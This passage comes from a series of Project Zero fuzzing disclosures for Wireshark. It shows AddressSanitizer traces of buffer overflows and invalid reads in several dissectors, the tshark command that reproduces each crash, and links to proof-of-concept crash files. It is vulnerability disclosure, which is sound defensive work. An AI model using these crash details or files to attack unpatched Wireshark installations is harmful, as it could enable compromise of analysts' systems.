#56 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#57 0x7fbe41b402be in call_dissector_only wireshark/epan/packet.c:2662:8
#58 0x7fbe41b31ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#59 0x7fbe41b3133b in dissect_record wireshark/epan/packet.c:501:3
#60 0x7fbe41adf3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#61 0x5264eb in process_packet wireshark/tshark.c:3728:5
#62 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#63 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79 in dissect_nbap_MACdPDU_Size
==31034==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11815. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38999.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=653
The following SIGSEGV crash due to an invalid memory write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31799==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000fff3 (pc 0x7f538efe2e98 bp 0x7ffff1414290 sp 0x7ffff1413a18 T0)
#0 0x7f538efe2e97 /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
#1 0x4aaeac in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#2 0x7f53989ebdee in get_value wireshark/epan/dissectors/packet-btatt.c:6021:9
#3 0x7f53989cd2a1 in dissect_btatt wireshark/epan/dissectors/packet-btatt.c:6434:40
#4 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#6 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#7 0x7f5398abde89 in dissect_btl2cap wireshark/epan/dissectors/packet-btl2cap.c:2217:26
#8 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#9 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#10 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#11 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#12 0x7f5398add99f in dissect_btle wireshark/epan/dissectors/packet-btle.c:760:21
#13 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#15 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#16 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#17 0x7f5398ae089b in dissect_btle_rf wireshark/epan/dissectors/packet-btle_rf.c:221:27
#18 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#20 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0x7f53989467c5 in dissect_bluetooth wireshark/epan/dissectors/packet-bluetooth.c:1748:10
#22 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f539911d5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f539840933b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f53983b73c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
==31799==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11817. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38998.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=655
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3325==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff80063d1c at pc 0x0000004aaf56 bp 0x7fff80063a50 sp 0x7fff80063200
WRITE of size 202 at 0x7fff80063d1c thread T0
#0 0x4aaf55 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x7fb265728fad in file_read wireshark/wiretap/file_wrappers.c:1222:13
#2 0x7fb2658ae866 in wtap_read_bytes_or_eof wireshark/wiretap/wtap.c:1363:15
#3 0x7fb265783fac in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:178:14
#4 0x7fb265782bfa in mp2t_bits_per_second wireshark/wiretap/mp2t.c:236:10
#5 0x7fb2657823a0 in mp2t_open wireshark/wiretap/mp2t.c:363:14
#6 0x7fb265716911 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#7 0x51bd1d in cf_open wireshark/tshark.c:4195:9
#8 0x51584e in main wireshark/tshark.c:2188:9
Address 0x7fff80063d1c is located in stack of thread T0 at offset 220 in frame
#0 0x7fb265783cdf in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:170
This frame has 1 object(s):
[32, 220) 'buffer' <== Memory access at offset 220 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100070004750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004780: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100070004790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000700047a0: 00 00 00[04]f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
0x1000700047b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047e0: f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 02 f2 02 f2
0x1000700047f0: 04 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3325==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11820. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38997.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=660
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7557==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7ff755ab5a18 at pc 0x7ff74b48f257 bp 0x7ffc467efe50 sp 0x7ffc467efe48
READ of size 4 at 0x7ff755ab5a18 thread T0
#0 0x7ff74b48f256 in dissct_rsl_ipaccess_msg wireshark/epan/dissectors/packet-rsl.c:3055:23
#1 0x7ff74b48a788 in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3181:18
#2 0x7ff74b4951cb in dissect_rsl_ie_err_msg wireshark/epan/dissectors/packet-rsl.c:2206:14
#3 0x7ff74b48bf1b in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3383:22
#4 0x7ff74b48a477 in dissect_rsl wireshark/epan/dissectors/packet-rsl.c:3847:14
#5 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#6 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#7 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#8 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#9 0x7ff7499e3344 in call_dissector wireshark/epan/packet.c:2692:9
#10 0x7ff74a88a7ee in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:365:5
#11 0x7ff74a889dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#12 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#15 0x7ff74b98a9dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#16 0x7ff74b990043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#17 0x7ff74b98b39c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#18 0x7ff74b9a07a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#19 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#21 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x7ff74aae688b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x7ff74aaf12b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#26 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0x7ff7499d9964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x7ff74a5f848d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x7ff74a5f4725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x7ff74a5ecf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#37 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x7ff74a6e85f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#41 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0x7ff7499d433b in dissect_record wireshark/epan/packet.c:501:3
#44 0x7ff7499823c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x5264eb in process_packet wireshark/tshark.c:3728:5
#46 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#47 0x515daf in main wireshark/tshark.c:2197:13
0x7ff755ab5a18 is located 0 bytes to the right of global variable 'rsl_att_tlvdef' defined in 'packet-rsl.c:685:30' (0x7ff755ab5220) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-rsl.c:3055:23 in dissct_rsl_ipaccess_msg
Shadow bytes around the buggy address:
0x0fff6ab4eaf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fff6ab4eb40: 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb80: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb90: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7557==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11829. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38996.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=661
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7849==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f8e33764094 at pc 0x7f8e29788726 bp 0x7ffe27806640 sp 0x7ffe27806638
READ of size 4 at 0x7f8e33764094 thread T0
#0 0x7f8e29788725 in dissect_zcl_pwr_prof_pwrprofstatersp wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21
#1 0x7f8e2977f2be in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3494:21
#2 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f8e297738ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f8e2974de40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f8e29757897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f8e297518aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f8e29752ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f8e271ab417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f8e2826863b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f8e2825e35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f8e271a2dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f8e27eb25f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f8e2719e33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f8e2714c3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f8e33764094 is located 44 bytes to the left of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f8e337640c0) of size 64
0x7f8e33764094 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_pwrprofiles' defined in 'packet-zbee-zcl-general.c:3328:13' (0x7f8e33764080) of size 20
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21 in dissect_zcl_pwr_prof_pwrprofstatersp
Shadow bytes around the buggy address:
0x0ff2466e47c0: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
0x0ff2466e47d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e47e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0ff2466e47f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4800: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
=>0x0ff2466e4810: 00 00[04]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e4820: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4830: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0ff2466e4840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7849==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11830. Attached are three files which trigger the crash.
Update: there is also a similar crash due to out-of-bounds access to the global "ett_zbee_zcl_pwr_prof_enphases" array, see the report below.
Attached is a file which triggers the crash.
--- cut ---
==8228==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0d4f321100 at pc 0x7f0d45344cd5 bp 0x7fff69e4e4a0 sp 0x7fff69e4e498
READ of size 4 at 0x7f0d4f321100 thread T0
#0 0x7f0d45344cd4 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25
#1 0x7f0d4533bd04 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3463:21
#2 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f0d453308ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f0d4530b750 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1680:9
#12 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f0d4530aee1 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1033:13
#17 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#20 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#21 0x7f0d45314897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#22 0x7f0d4530e8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#23 0x7f0d4530fef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#24 0x7f0d42d68417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#25 0x7f0d43e2563b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#26 0x7f0d43e1b40a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:594:5
#27 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f0d42d5fdbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#30 0x7f0d43a6f5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#31 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#32 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#33 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#34 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#35 0x7f0d42d5b33b in dissect_record wireshark/epan/packet.c:501:3
#36 0x7f0d42d093c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#37 0x5264eb in process_packet wireshark/tshark.c:3728:5
#38 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#39 0x515daf in main wireshark/tshark.c:2197:13
0x7f0d4f321100 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:4460:13' (0x7f0d4f321120) of size 128
0x7f0d4f321100 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f0d4f3210c0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0fe229e5c1d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe229e5c1e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0fe229e5c1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c200: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c210: 00 00 04 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0fe229e5c220:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c230: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8228==ABORTING
--- cut ---
Furthermore, there is yet another similar condition in a somewhat related area of code, see the attached file and report below:
--- cut ---
==8856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f148fad2900 at pc 0x7f1485afc15d bp 0x7ffd41dc3de0 sp 0x7ffd41dc3dd8
READ of size 4 at 0x7f148fad2900 thread T0
#0 0x7f1485afc15c in dissect_zcl_appl_evtalt_get_alerts_rsp wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21
#1 0x7f1485afab0f in dissect_zbee_zcl_appl_evtalt wireshark/epan/dissectors/packet-zbee-zcl-ha.c:818:21
#2 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f1485ae18ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f1485abbe40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f1485ac5897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f1485abf8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f1485ac0ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f1483519417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f14845d663b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f14845cc35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f1483510dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f14842205f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
